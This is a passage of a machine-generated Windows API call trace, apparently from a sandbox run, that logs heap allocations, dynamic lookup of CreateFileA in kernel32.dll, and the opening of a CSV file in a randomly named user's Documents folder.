dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0177.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0177.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0177.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0177.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0177.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0177.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0177.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0177.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0177.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0177.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0177.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0177.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0177.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0177.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0177.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0177.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0177.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0177.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0177.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0177.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0177.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0177.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0177.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0177.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0177.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0177.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0177.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0177.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0177.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0177.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0177.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0177.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0177.167] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0177.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0177.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0177.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0177.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0177.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0177.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0177.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0177.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0177.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0177.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0177.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0177.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0177.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0177.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0177.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0177.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0177.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0177.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0177.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0177.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0177.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0177.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0177.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0177.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0177.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0177.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0177.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0177.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0177.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0177.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0177.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0177.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0177.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0177.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0177.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0177.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0177.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0177.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0177.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0177.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0177.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0177.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0177.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0177.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0177.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0177.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0177.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0177.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0177.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0177.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0177.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0177.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0177.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0177.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0177.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0177.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0177.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0177.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0177.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0177.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0177.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0177.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0177.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0177.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0177.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0177.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0177.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0177.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0177.170] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0177.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0177.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd780 [0177.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd780, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0177.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0177.170] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0177.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0177.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0177.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0177.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0177.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0177.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0177.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd780 [0177.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd780, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0177.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0177.171] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0177.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0177.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0177.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0177.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0177.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0177.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0177.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0177.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0177.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0177.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0177.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0177.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0177.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv", cchWideChar=80, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 80 [0177.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0177.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv", cchWideChar=80, lpMultiByteStr=0x923a78, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv", lpUsedDefaultChar=0x0) returned 80 [0177.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0177.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0177.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0177.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0177.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0177.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0177.172] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\-v0 o3_nr9rc3_2dhh4.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0177.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0177.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0177.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0177.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0177.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0177.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0177.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0177.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0177.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0177.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0177.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0177.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0177.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0177.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=80, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0177.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0177.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=80, lpWideCharStr=0x8f9100, cchWideChar=80 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.csv") returned 80 [0177.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0177.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0177.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0177.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0177.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0177.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0177.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0177.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0177.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0177.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0177.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0177.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0177.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0177.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0177.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0177.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0177.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0177.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0177.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0177.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0177.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0177.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0177.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0177.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0177.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0177.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0177.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0177.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0177.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0177.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0177.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0177.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0177.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0177.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0177.178] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.178] HeapFree (in: 